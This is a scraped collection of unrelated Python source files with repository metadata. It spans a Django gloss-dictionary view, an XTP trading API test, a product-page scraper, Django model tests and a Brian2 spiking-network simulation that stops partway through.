# If the Gloss does not already exist, continue adding.
if not Gloss.objects.filter(dataset=dataset, idgloss=gloss[0]).exists():
try:
new_gloss = Gloss(dataset=dataset, idgloss=gloss[0], idgloss_en=gloss[1],
created_by=request.user, updated_by=request.user)
except IndexError:
# If we get IndexError, idgloss_en was probably not provided
new_gloss = Gloss(dataset=dataset, idgloss=gloss[0],
created_by=request.user, updated_by=request.user)
new_gloss.save()
glosses_added.append((new_gloss.idgloss, new_gloss.idgloss_en))
# Flush request.session['glosses_new'] and request.session['dataset']
del request.session['glosses_new']
del request.session['dataset_id']
# Set a message to be shown so that the user knows what is going on.
messages.add_message(request, messages.SUCCESS, _('Glosses were added succesfully.'))
return render(request, "dictionary/import_gloss_csv_confirmation.html", {'glosses_added': glosses_added,
'dataset': dataset.name})
else:
return HttpResponseRedirect(reverse('dictionary:import_gloss_csv'))
else:
# If request method is not POST, redirect to the import form
return HttpResponseRedirect(reverse('dictionary:import_gloss_csv'))
def gloss_relation(request):
"""Processes Gloss Relations"""
if request.method == "POST":
form = GlossRelationForm(request.POST)
if "delete" in form.data:
glossrelation = get_object_or_404(GlossRelation, id=int(form.data["delete"]))
if 'view_dataset' not in get_perms(request.user, glossrelation.source.dataset):
# If user has no permissions to dataset, raise PermissionDenied to show 403 template.
msg = _("You do not have permissions to delete relations from glosses of this lexicon.")
messages.error(request, msg)
raise PermissionDenied(msg)
ct = ContentType.objects.get_for_model(GlossRelation)
# Delete TaggedItems and the GlossRelation
TaggedItem.objects.filter(object_id=glossrelation.id, content_type=ct).delete()
glossrelation.delete()
if "HTTP_REFERER" in request.META:
return redirect(request.META["HTTP_REFERER"])
return redirect("/")
if form.is_valid():
source = get_object_or_404(Gloss, id=form.cleaned_data["source"])
if 'view_dataset' not in get_perms(request.user, source.dataset):
# If user has no permissions to dataset, raise PermissionDenied to show 403 template.
msg = _("You do not have permissions to add relations to glosses of this lexicon.")
messages.error(request, msg)
raise PermissionDenied(msg)
target = get_object_or_404(Gloss, id=form.cleaned_data["target"])
glossrelation = GlossRelation.objects.create(source=source, target=target)
if form.cleaned_data["tag"]:
Tag.objects.add_tag(glossrelation, form.cleaned_data["tag"].name)
if "HTTP_REFERER" in request.META:
return redirect(request.META["HTTP_REFERER"])
return redirect("/")
return HttpResponseBadRequest("Bad request.")
return HttpResponseForbidden()
| [
"[email protected]"
] | |
bed9cb10f6453c7018cc7f08aefc7153fb29f8cd | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/ETFMM_K/YW_ETFMM_SZSJ_408_K.py | 1bed5c3ce3bd01583d66e471f4a5c2ac987176e2 | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,088 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_ETFMM_SZSJ_408_K(xtp_test_case):
# YW_ETFMM_SZSJ_408_K
def test_YW_ETFMM_SZSJ_408_K(self):
title = '深圳A股股票交易日五档即成转撤销委托卖-错误的业务类型'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '废单',
'errorID': 11000370,
'errorMSG': queryOrderErrorMsg(11000370),
'是否生成报单': '否',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('999999', '2', '14', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_IPOS'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SZ_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_BEST5_OR_CANCEL'],
'price': stkparm['随机中间价'],
'quantity': 200,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
9c1513fc38a50fa093602c41444c8be32727345d | f47fe8a7d8cd87b3bfa2e172b4a9fc93e3a4abc2 | /2015/AST1/vezbovni/David/habl.py | 1b759c2b4f14d8433cbff56e9e18ac1feecb3585 | [] | no_license | ispastlibrary/Titan | a4a7e4bb56544d28b884a336db488488e81402e0 | f60e5c6dc43876415b36ad76ab0322a1f709b14d | refs/heads/master | 2021-01-17T19:23:32.839966 | 2016-06-03T13:47:44 | 2016-06-03T13:47:44 | 60,350,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | import numpy as np
#import matplot.pyplot as plt
d, V, wi, deltav = np.loadtxt(habl.txt, unpac=True)
sum_wi = np.sum(wi)
sum_wy = np.sum()
sum_wx = np.sum()
sum_wxy = np.sum(wi*d*V)
sum_wx2 = no.sum(wi*d*d)
b = (sum_wxy * sum_wi -sum_wy * sum_wx) / (sum_wi * sum_wx2 - (sum_wx)**2)
print(b)
| [
"[email protected]"
] | |
f31dc60f9d3b228389bf28bd150e6776ddfe7cc1 | c2be187155aabf59a4c0d3f5065bc26239c0b827 | /special_crawler/extract_statelinetack_data.py | 309d78b9da4250c853051dd1e955893f8a217962 | [] | no_license | dankCodeNugs/tmtext | 1d6c54f79399bfa5e6f3905c0f72ba0be59d8d0d | 8e2d834775f440def7f57294674b8109b46ee191 | refs/heads/master | 2023-03-16T08:49:38.456929 | 2016-12-20T19:45:54 | 2016-12-20T19:45:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,954 | py | #!/usr/bin/python
import urllib
import re
import sys
import json
from lxml import html, etree
import time
import requests
from extract_data import Scraper
class StateLineTackScraper(Scraper):
'''
NOTES :
no_image examples:
http://www.statelinetack.com/item/horseware-pony-liner-200g/E012435/
'''
##########################################
############### PREP
##########################################
# holds a data from an external request for loading
bazaar = None
INVALID_URL_MESSAGE = "Expected URL format is http://www.statelinetack.com/item/<product-name>/<product-id>/"
def check_url_format(self):
"""Checks product URL format for this scraper instance is valid.
Returns:
True if valid, False otherwise
"""
#m = re.match("^http://www.amazon.com/dp/[a-zA-Z0-9]+$", self.product_page_url)
m = re.match(r"^http://www.statelinetack.com/.*?$", self.product_page_url)
return not not m
##########################################
############### CONTAINER : NONE
##########################################
def _url(self):
return self.product_page_url
def _event(self):
return None
def _product_id(self):
product_id = self.tree_html.xpath('//input[@id="ctl00_ctl00_CenterContentArea_MainContent_HidBaseNo"]/@value')[0]
return product_id
def _site_id(self):
return None
def _status(self):
return "success"
##########################################
############### CONTAINER : PRODUCT_INFO
##########################################
def _product_name(self):
a = self.tree_html.xpath('//*[@itemprop="name"]/text()')[0]
if a is not None and len(a)>3:
return a
return self._product_title()
def _product_title(self):
return self.tree_html.xpath("//meta[@property='og:title']/@content")[0]
def _title_seo(self):
return self.tree_html.xpath("//title//text()")[0].strip()
def _model(self):
return None
def _upc(self):
return None
def _features(self):
desc, feat = self._feature_helper()
return feat
def _feature_count(self):
desc, feat = self._feature_helper()
return len(feat)
def _feature_helper(self):
tree = self.tree_html
tree = str(etree.tostring(tree))
print re.findall(r'\s*<strong>\s*(.*)\s*</strong>\s*', tree)# take care of some crazy spacing issues
tree = re.sub(r'\s*<strong>\s*(.*)\s*</strong>\s*', r'\1', tree)
tree = re.sub(r'\n', '', tree)
tree = html.fromstring(tree)
full_description = [x.strip() for x in tree.xpath('//div[@id="ItemPageProductSummaryBoxMain"]//div[@class="GreyBoxMiddle"]//text()') if len(x.strip())>0]
full_description = [x for x in full_description if len(x)>3]
feat_index = [i for i in range(len(full_description)) if re.findall(r'^.{0,10}(F|f)eatures.{0,4}$', full_description[i])]
spec_index = [i for i in range(len(full_description)) if re.findall(r'^.{0,10}(S|s)pecifications.{0,4}$', full_description[i])]
if len(feat_index)>0:
feat_index = feat_index[0]
else:
feat_index = 0
if len(spec_index)>0:
spec_index = spec_index[0]
else:
spec_index = None
if spec_index>0:
feat = full_description[feat_index+1:spec_index]
else:
feat = full_description[feat_index+1:]
if feat_index>0:
desc = full_description[0:feat_index]
else:
desc = full_description[0]
if isinstance(desc, str) or isinstance(desc, unicode):
temp = []
temp.append(desc)
desc = temp
return desc, feat
def _model_meta(self):
return None
def _description(self):
# description = ([x.strip() for x in self.tree_html.xpath('//div[@id="ItemPageProductSummaryBoxMain"]//div[@class="GreyBoxMiddle"]//text()') if len(x.strip())>0])
# for row in range(0,6):
# if len(description[row]) > 3:#to avoid the heading "product description"
# return description[row]
# return None
desc, feat = self._feature_helper()
return ' '.join(desc)
def _long_description(self):
return None
##########################################
############### CONTAINER : PAGE_ATTRIBUTES
##########################################
def _no_image(self):
return None
def _mobile_image_same(self):
return None
def _image_urls(self):
#metaimg comes from meta tag
#metaimg = self.tree_html.xpath('//meta[@property="og:image"]/@content')
#imgurl comes from the carousel
imageurl = self.tree_html.xpath('//img[@class="swatch"]/@src')
if(len(imageurl) == 0):
imageurl = self.tree_html.xpath('//meta[@property="og:image"]/@content')
return imageurl
def _image_count(self):
imgurls = self._image_urls()
return len(imgurls)
def _video_urls(self):
#"url":"http://ecx.images-amazon.com/images/I/B1d2rrt0oJS.mp4"
video_url = self.tree_html.xpath('//script[@type="text/javascript"]')
temp = []
for v in video_url:
r = re.findall("[\'\"]url[\'\"]:[\'\"](http://.+?\.mp4)[\'\"]", str(v.xpath('.//text()')))
if r:
temp.extend(r)
return temp
def _video_count(self):
return len(self._video_urls())
def _pdf_urls(self):
moreinfo = self.tree_html.xpath('//div[@class="ItemPageDownloadableResources"]//div//a/@href')
pdfurl = []
print '\n\n'
for a in moreinfo:
p = re.findall(r'(.*\.pdf)', a)
pdfurl.extend(p)
baseurl = 'http://www.statelinetack.com/'
pdfurl = [baseurl + x[1:] for x in pdfurl]
return pdfurl
def _pdf_count(self):
return len(self._pdf_urls())
def _webcollage(self):
return None
def _htags_from_tree(self):
htags_dict = {}
# add h1 tags text to the list corresponding to the "h1" key in the dict
htags_dict["h1"] = map(lambda t: self._clean_text(t), self.tree_html.xpath("//h1//text()[normalize-space()!='']"))
# add h2 tags text to the list corresponding to the "h2" key in the dict
htags_dict["h2"] = map(lambda t: self._clean_text(t), self.tree_html.xpath("//h2//text()[normalize-space()!='']"))
return htags_dict
def _keywords(self):
return None
##########################################
############### CONTAINER : REVIEWS
##########################################
#bazaar for ratings
def get_bazaar(self):
if self.bazaar != None:
return self.bazaar
else:
url = 'http://tabcomstatelinetack.ugc.bazaarvoice.com/3421-en_us/%s/reviews.djs?format=embeddedhtml'
url = url % (self._product_id())
contents = urllib.urlopen(url).read()
# tree = re.findall(r'var materials=(\{.*?\}.*\})', contents)[0]
# tree = re.sub(r'\\(.)', r'\1', tree)
# tree = re.findall(r'(\<.*\>)', tree)[0]
# tree = html.fromstring(contents)
return contents
#extract average review, and total reviews
def _average_review(self):
bazaar = self.get_bazaar()
# avg = bazaar.xpath('//*[contains(@class, "BVRRRatingNumber")]//text()')
# avg = re.findall(r'<span class=\\"BVRRNumber BVRRRatingRangeNumber\\">(.*?)<\\/span>', bazaar)
avg = re.findall(r'<span class=\\"BVRRNumber BVRRRatingNumber\\">([0-9.]*?)<\\/span>', bazaar)
return avg[0]
def _review_count(self):
bazaar = self.get_bazaar()
# num = bazaar.xpath('//*[contains(@class, "BVRRRatingRangeNumber")]//text()')
num = re.findall(r'\<span class\=\\"BVRRNumber\\"\>([0-9]*?)\<\\/span\> review', bazaar)
return num[0]
def _max_review(self):
return None
def _min_review(self):
return None
##########################################
############### CONTAINER : SELLERS
##########################################
def _price(self):
price = self.tree_html.xpath("//span[@id='lowPrice']//text()")
if price:
return price[0].strip()
return None
def _in_stores_only(self):
return None
def _in_stores(self):
return None
def _owned(self):
return 1
def _owned_out_of_stock(self):
return None
def _marketplace(self):
return 0
def _marketplace_sellers(self):
return None
def _marketplace_lowest_price(self):
return None
##########################################
############### CONTAINER : SELLERS
##########################################
def _category_name(self):
all = self._categories()
all = map(lambda t: self._clean_text(t), all)
return all[-1]
def _categories(self):
all = self.tree_html.xpath('//div[@id="ItemPageBreadCrumb"]//a/text()')
return all
def _brand(self):
return None
#########################################
################ HELPER FUNCTIONS
##########################################
# clean text inside html tags - remove html entities, trim spaces
def _clean_text(self, text):
return re.sub(" ", " ", text).strip()
##########################################
################ RETURN TYPES
##########################################
# dictionaries mapping type of info to be extracted to the method that does it
# also used to define types of data that can be requested to the REST service
DATA_TYPES = { \
# CONTAINER : NONE
"url" : _url, \
"event" : _event, \
"product_id" : _product_id, \
"site_id" : _site_id, \
"status" : _status, \
# CONTAINER : PRODUCT_INFO
"product_name" : _product_name, \
"product_title" : _product_title, \
"title_seo" : _title_seo, \
"model" : _model, \
"upc" : _upc,\
"features" : _features, \
"feature_count" : _feature_count, \
"model_meta" : _model_meta, \
"description" : _description, \
"long_description" : _long_description, \
# CONTAINER : PAGE_ATTRIBUTES
"image_urls" : _image_urls, \
"image_count" : _image_count, \
"video_urls" : _video_urls, \
"video_count" : _video_count, \
"pdf_urls" : _pdf_urls, \
"pdf_count" : _pdf_count, \
"webcollage" : _webcollage, \
"htags" : _htags_from_tree, \
"keywords" : _keywords, \
# CONTAINER : REVIEWS
"average_review" : _average_review, \
"review_count" : _review_count, \
"max_review" : _max_review, \
"min_review" : _min_review, \
# CONTAINER : SELLERS
"price" : _price, \
"in_stores_only" : _in_stores_only, \
"in_stores" : _in_stores, \
"owned" : _owned, \
"owned_out_of_stock" : _owned_out_of_stock, \
"marketplace": _marketplace, \
"marketplace_sellers" : _marketplace_sellers, \
"marketplace_lowest_price" : _marketplace_lowest_price, \
# CONTAINER : CLASSIFICATION
"categories" : _categories, \
"category_name" : _category_name, \
"brand" : _brand, \
"loaded_in_seconds": None \
}
# special data that can't be extracted from the product page
# associated methods return already built dictionary containing the data
DATA_TYPES_SPECIAL = { \
"mobile_image_same" : _mobile_image_same, \
"no_image" : _no_image,\
}
# def _anchors_from_tree(self):
# description_node = self.tree_html.xpath('//div[contains(@class, "GreyBoxMiddle")]/div/span/span/span/div[3]')[0]
# links = description_node.xpath(".//a")
# nr_links = len(links)
# links_dicts = []
# for link in links:
# links_dicts.append({"href" : link.xpath("@href")[0], "text" : link.xpath("text()")[0]})
# ret = {"quantity" : nr_links, "links" : links_dicts}
# return ret
# def _seller_meta_from_tree(self):
# return self.tree_html.xpath("//meta[@itemprop='brand']/@content")[0]
# def _meta_description(self):
# return self.tree_html.xpath("//meta[@name='Description']/@content")[0]
# def _meta_keywords(self):
# return self.tree_html.xpath("//meta[@name='Keywords']/@content")[0]
# def main(args):
# # check if there is an argument
# if len(args) <= 1:
# sys.stderr.write("ERROR: No product URL provided.\nUsage:\n\tpython crawler_service.py <amazon_product_url>\n")
# sys.exit(1)
# product_page_url = args[1]
# # check format of page url
# if not check_url_format(product_page_url):
# sys.stderr.write(INVALID_URL_MESSAGE)
# sys.exit(1)
# return json.dumps(product_info(sys.argv[1], ["name", "short_desc", "keywords", "price", "load_time", "anchors", "long_desc"]))
| [
"[email protected]"
] | |
b91fb546cbb42329ea80e0be279d6f298648f0d1 | 848cf2c39afe417272ce96d738266995cb0c9ca1 | /jirani/tests.py | 4c8d790627ab1c565880f05b726771f4c571271d | [
"MIT"
] | permissive | cliffnyendwe/neighbourhood | 462c2d13d966745de6c63675e799e57cf412eca8 | 77e1a1a082a94fb5a883012a66bf2a4504e6d33b | refs/heads/master | 2020-04-14T05:41:39.902621 | 2019-01-14T08:10:40 | 2019-01-14T08:10:40 | 163,369,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 716 | py |
from django.test import TestCase
# Create your tests here.
from django.test import TestCase
from django.contrib.auth.models import User
from .models import Neighborhood , Profile , Business
class TestUser(TestCase):
def setUp(self):
self.testuser = User(username="user", email="[email protected]")
def test_instance(self):
self.assertIsInstance(self.testuser, User)
def test_save_user(self):
self.assertFalse(self.testuser in User.objects.all())
self.testuser.save()
self.assertTrue(self.testuser in User.objects.all())
def test_save_profile(self):
self.fuser = User(username="fuser", email="[email protected]")
self.fuser.save()
| [
"cliffnyendwe"
] | cliffnyendwe |
022fef7f993959e9795ef0ae1fee032d527a65ef | 1ae03694e6826c2c3224647024f66debcebd62dc | /algorithms/python/knmf/hdf5/__init__.py | 602275033b55a0483937b09a25904e30334569ba | [
"Apache-2.0"
] | permissive | Joaggi/Robust-kernels-for-robust-location-estimation | 5ad7f8f3be9a08e5d4283e03e017e5e3b9b186b8 | 9db62273de90547c982d819dc45e66ac86bfcb58 | refs/heads/master | 2023-04-17T22:41:01.652426 | 2022-08-02T23:43:31 | 2022-08-02T23:43:31 | 27,465,913 | 3 | 1 | null | 2022-08-02T23:39:44 | 2014-12-03T02:49:24 | MATLAB | UTF-8 | Python | false | false | 30 | py |
from h5OnlineReader import *
| [
"[email protected]"
] | |
e70f718b0081ee8c8810ed55397e1910334d55c5 | cfd2e1f12208dad79bc4b899e81ce1f7de84e80c | /Brian2_scripts/sim_brian_scratch/sim_brian_Jv/sim_brian_Jv_v1_BO.py | b318d3f325f9ca58e4ad173ccd6f21b9406e0375 | [] | no_license | zhouyanasd/DL-NC | 334adafdea1dd8c4c08c7efef3abc3b623344f0d | 396521096f65b27aa24efb1deda7b215876166b2 | refs/heads/master | 2023-03-22T04:57:19.790975 | 2023-03-14T08:57:01 | 2023-03-14T08:57:01 | 64,385,964 | 41 | 9 | null | 2023-02-15T17:52:34 | 2016-07-28T10:22:45 | Python | UTF-8 | Python | false | false | 17,260 | py | # ----------------------------------------
# LSM without STDP for Jv test
# add neurons to readout layer for multi-classification(one-versus-the-rest)
# using softmax(logistic regression)
# input layer is changed to 781*1 with encoding method
# change the LSM structure according to Maass paper
# new calculate flow as Maass_ST
# simplify the coding method with only extend the rank
# for the BO in parallel run
# ----------------------------------------
from brian2 import *
from brian2tools import *
import scipy as sp
from scipy import stats
import struct
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import accuracy_score
import pickle
from bqplot import *
import ipywidgets as widgets
import warnings
import os
from multiprocessing import Pool
import cma
import bayes_opt
from functools import partial
warnings.filterwarnings("ignore")
prefs.codegen.target = "numpy"
start_scope()
np.random.seed(100)
data_path = '../../../Data/Jv/'
# ------define general function------------
class Function():
def __init__(self):
pass
def logistic(self, f):
return 1 / (1 + np.exp(-f))
def softmax(self, z):
return np.array([(np.exp(i) / np.sum(np.exp(i))) for i in z])
def gamma(self, a, size):
return stats.gamma.rvs(a, size=size)
class Base():
def update_states(self, type='pandas', *args, **kwargs):
for seq, state in enumerate(kwargs):
if type == 'pandas':
kwargs[state] = kwargs[state].append(pd.DataFrame(args[seq]))
elif type == 'numpy':
kwargs[state] = self.np_extend(kwargs[state], args[seq], 1)
return kwargs
def normalization_min_max(self, arr):
arr_n = arr
for i in range(arr.size):
x = float(arr[i] - np.min(arr)) / (np.max(arr) - np.min(arr))
arr_n[i] = x
return arr_n
def mse(self, y_test, y):
return sp.sqrt(sp.mean((y_test - y) ** 2))
def classification(self, thea, data):
data_n = self.normalization_min_max(data)
data_class = []
for a in data_n:
if a >= thea:
b = 1
else:
b = 0
data_class.append(b)
return np.asarray(data_class), data_n
def allocate(self, G, X, Y, Z):
V = np.zeros((X, Y, Z), [('x', float), ('y', float), ('z', float)])
V['x'], V['y'], V['z'] = np.meshgrid(np.linspace(0, X - 1, X), np.linspace(0, X - 1, X),
np.linspace(0, Z - 1, Z))
V = V.reshape(X * Y * Z)
np.random.shuffle(V)
n = 0
for g in G:
for i in range(g.N):
g.x[i], g.y[i], g.z[i] = V[n][0], V[n][1], V[n][2]
n += 1
return G
def w_norm2(self, n_post, Synapsis):
for i in range(n_post):
a = Synapsis.w[np.where(Synapsis._synaptic_post == i)[0]]
Synapsis.w[np.where(Synapsis._synaptic_post == i)[0]] = a / np.linalg.norm(a)
def np_extend(self, a, b, axis=0):
if a is None:
shape = list(b.shape)
shape[axis] = 0
a = np.array([]).reshape(tuple(shape))
return np.append(a, b, axis)
def np_append(self, a, b):
shape = list(b.shape)
shape.insert(0, -1)
if a is None:
a = np.array([]).reshape(tuple(shape))
return np.append(a, b.reshape(tuple(shape)), axis=0)
def parameters_GS(self, *args, **kwargs):
#---------------
# args = [(min,max),]
# kwargs = {'parameter' = number,}
#---------------
parameters = np.zeros(tuple(kwargs.values()), [(x, float) for x in kwargs.keys()])
grids = np.meshgrid(*[np.linspace(min_max[0], min_max[1], scale)
for min_max,scale in zip(args,kwargs.values())], indexing='ij')
for index, parameter in enumerate(kwargs.keys()):
parameters[parameter] = grids[index]
parameters = parameters.reshape(-1)
return parameters
class Readout():
def readout_sk(self, X_train, X_test, y_train, y_test, **kwargs):
from sklearn.linear_model import LogisticRegression
lr = LogisticRegression(**kwargs)
lr.fit(X_train.T, y_train.T)
y_train_predictions = lr.predict(X_train.T)
y_test_predictions = lr.predict(X_test.T)
return accuracy_score(y_train_predictions, y_train.T), accuracy_score(y_test_predictions, y_test.T)
class Result():
def __init__(self):
pass
def result_save(self, path, *arg, **kwarg):
if os.path.exists(path):
os.remove(path)
fw = open(path, 'wb')
pickle.dump(kwarg, fw)
fw.close()
def result_pick(self, path):
fr = open(path, 'rb')
data = pickle.load(fr)
fr.close()
return data
def animation(self, t, v, interval, duration, a_step=10, a_interval=100, a_duration=10):
xs = LinearScale()
ys = LinearScale()
line = Lines(x=t[:interval], y=v[:, :interval], scales={'x': xs, 'y': ys})
xax = Axis(scale=xs, label='x', grid_lines='solid')
yax = Axis(scale=ys, orientation='vertical', tick_format='0.2f', label='y', grid_lines='solid')
fig = Figure(marks=[line], axes=[xax, yax], animation_duration=a_duration)
def on_value_change(change):
line.x = t[change['new']:interval + change['new']]
line.y = v[:, change['new']:interval + change['new']]
play = widgets.Play(
interval=a_interval,
value=0,
min=0,
max=duration,
step=a_step,
description="Press play",
disabled=False
)
slider = widgets.IntSlider(min=0, max=duration)
widgets.jslink((play, 'value'), (slider, 'value'))
slider.observe(on_value_change, names='value')
return play, slider, fig
class Jv_classification():
def __init__(self, coding_duration):
self.coding_duration = coding_duration
def load_Data_Jv(self, t, path_value, path_label, is_norm=True):
if t == "train":
label = np.loadtxt(path_label, delimiter=None).astype(int)[1]
elif t == "test":
label = np.loadtxt(path_label, delimiter=None).astype(int)[0]
else:
raise TypeError("t must be 'train' or 'test'")
data = np.loadtxt(path_value, delimiter=None)
if is_norm:
data = MinMaxScaler().fit_transform(data)
s = open(path_value, 'r')
i = -1
size = []
while True:
lines = s.readline()
i += 1
if not lines:
break
if lines == '\n': # "\n" needed to be added at the end of the file
i -= 1
size.append(i)
continue
size_d = np.concatenate(([0], (np.asarray(size) + 1)))
data_list = [data[size_d[i]:size_d[i + 1]] for i in range(len(size_d) - 1)]
label_list = []
j = 0
for n in label:
label_list.extend([j] * n)
j += 1
data_frame = pd.DataFrame({'value': pd.Series(data_list), 'label': pd.Series(label_list)})
return data_frame
def load_Data_Jv_all(self, path, is_norm=True):
self.train = self.load_Data_Jv('train', path + 'train.txt',
path + 'size.txt', is_norm)
self.test = self.load_Data_Jv('test', path + 'test.txt',
path + 'size.txt', is_norm)
def select_data(self, fraction, data_frame, is_order=True, **kwargs):
try:
selected = kwargs['selected']
except KeyError:
selected = np.arange(9)
if is_order:
data_frame_selected = data_frame[data_frame['label'].isin(selected)].sample(
frac=fraction).sort_index().reset_index(drop=True)
else:
data_frame_selected = data_frame[data_frame['label'].isin(selected)].sample(frac=fraction).reset_index(
drop=True)
return data_frame_selected
def _encoding_cos(self, x, n, A):
encoding = []
for i in range(int(n)):
trans_cos = np.around(0.5 * A * (np.cos(x + np.pi * (i / n)) + 1)).clip(0, A - 1)
coding = [([0] * trans_cos.shape[1]) for i in range(A * trans_cos.shape[0])]
for index_0, p in enumerate(trans_cos):
for index_1, q in enumerate(p):
coding[int(q) + A * index_0][index_1] = 1
encoding.extend(coding)
return np.asarray(encoding)
def _encoding_cos_rank(self, x, n, A):
encoding = np.zeros((x.shape[0] * A, n * x.shape[1]), dtype='<i1')
for i in range(int(n)):
trans_cos = np.around(0.5 * A * (np.cos(x + np.pi * (i / n)) + 1)).clip(0, A - 1)
for index_0, p in enumerate(trans_cos):
for index_1, q in enumerate(p):
encoding[int(q) + A * index_0, index_1 * n + i] = 1
return np.asarray(encoding)
def encoding_latency_Jv(self, coding_f, analog_data, coding_n, min=0, max=np.pi):
f = lambda x: (max - min) * (x - np.min(x)) / (np.max(x) - np.min(x))
value = analog_data['value'].apply(f).apply(coding_f, n=coding_n, A=int(self.coding_duration))
return pd.DataFrame({'value': pd.Series(value), 'label': pd.Series(analog_data['label'])})
def get_series_data_list(self, data_frame, is_group=False):
data_frame_s = []
if not is_group:
for value in data_frame['value']:
data_frame_s.extend(value)
else:
for value in data_frame['value']:
data_frame_s.append(value)
label = data_frame['label']
return np.asarray(data_frame_s), label
###################################
# -----simulation parameter setting-------
coding_n = 3
dim = 12
coding_duration = 10
F_train = 1
F_test = 1
Dt = defaultclock.dt = 1 * ms
#-------class initialization----------------------
function = Function()
base = Base()
readout = Readout()
result = Result()
Jv = Jv_classification(coding_duration)
# -------data initialization----------------------
Jv.load_Data_Jv_all(data_path)
df_train = Jv.select_data(F_train, Jv.train, False)
df_test = Jv.select_data(F_test, Jv.test, False)
df_en_train = Jv.encoding_latency_Jv(Jv._encoding_cos_rank, df_train, coding_n)
df_en_test = Jv.encoding_latency_Jv(Jv._encoding_cos_rank, df_test, coding_n)
data_train_s, label_train = Jv.get_series_data_list(df_en_train, is_group=True)
data_test_s, label_test = Jv.get_series_data_list(df_en_test, is_group=True)
#-------get numpy random state------------
np_state = np.random.get_state()
############################################
# ---- define network run function----
def run_net(inputs, **parameter):
#---- set numpy random state for each run----
np.random.set_state(np_state)
# -----parameter setting-------
n_ex = 400
n_inh = int(n_ex/4)
n_input = dim * coding_n
n_read = n_ex+n_inh
R = parameter['R']
f = parameter['f']
A_EE = 30*f
A_EI = 60*f
A_IE = 19*f
A_II = 19*f
A_inE = 18*f
A_inI = 9*f
tau_ex = parameter['tau']*coding_duration
tau_inh = parameter['tau']*coding_duration
tau_read= 30
p_inE = 0.1
p_inI = 0.1
#------definition of equation-------------
neuron_in = '''
I = stimulus(t,i) : 1
'''
neuron = '''
tau : 1
dv/dt = (I-v) / (tau*ms) : 1 (unless refractory)
dg/dt = (-g)/(3*ms) : 1
dh/dt = (-h)/(6*ms) : 1
I = (g+h)+13.5: 1
x : 1
y : 1
z : 1
'''
neuron_read = '''
tau : 1
dv/dt = (I-v) / (tau*ms) : 1
dg/dt = (-g)/(3*ms) : 1
dh/dt = (-h)/(6*ms) : 1
I = (g+h): 1
'''
synapse = '''
w : 1
'''
on_pre_ex = '''
g+=w
'''
on_pre_inh = '''
h-=w
'''
# -----Neurons and Synapses setting-------
Input = NeuronGroup(n_input, neuron_in, threshold='I > 0', method='euler', refractory=0 * ms,
name = 'neurongroup_input')
G_ex = NeuronGroup(n_ex, neuron, threshold='v > 15', reset='v = 13.5', method='euler', refractory=3 * ms,
name ='neurongroup_ex')
G_inh = NeuronGroup(n_inh, neuron, threshold='v > 15', reset='v = 13.5', method='euler', refractory=2 * ms,
name ='neurongroup_in')
G_readout = NeuronGroup(n_read, neuron_read, method='euler', name='neurongroup_read')
S_inE = Synapses(Input, G_ex, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_inE')
S_inI = Synapses(Input, G_inh, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_inI')
S_EE = Synapses(G_ex, G_ex, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_EE')
S_EI = Synapses(G_ex, G_inh, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_EI')
S_IE = Synapses(G_inh, G_ex, synapse, on_pre = on_pre_inh ,method='euler', name='synapses_IE')
S_II = Synapses(G_inh, G_inh, synapse, on_pre = on_pre_inh ,method='euler', name='synapses_I')
S_E_readout = Synapses(G_ex, G_readout, 'w = 1 : 1', on_pre=on_pre_ex, method='euler')
S_I_readout = Synapses(G_inh, G_readout, 'w = 1 : 1', on_pre=on_pre_inh, method='euler')
#-------initialization of neuron parameters----------
G_ex.v = '13.5+1.5*rand()'
G_inh.v = '13.5+1.5*rand()'
G_readout.v = '0'
G_ex.g = '0'
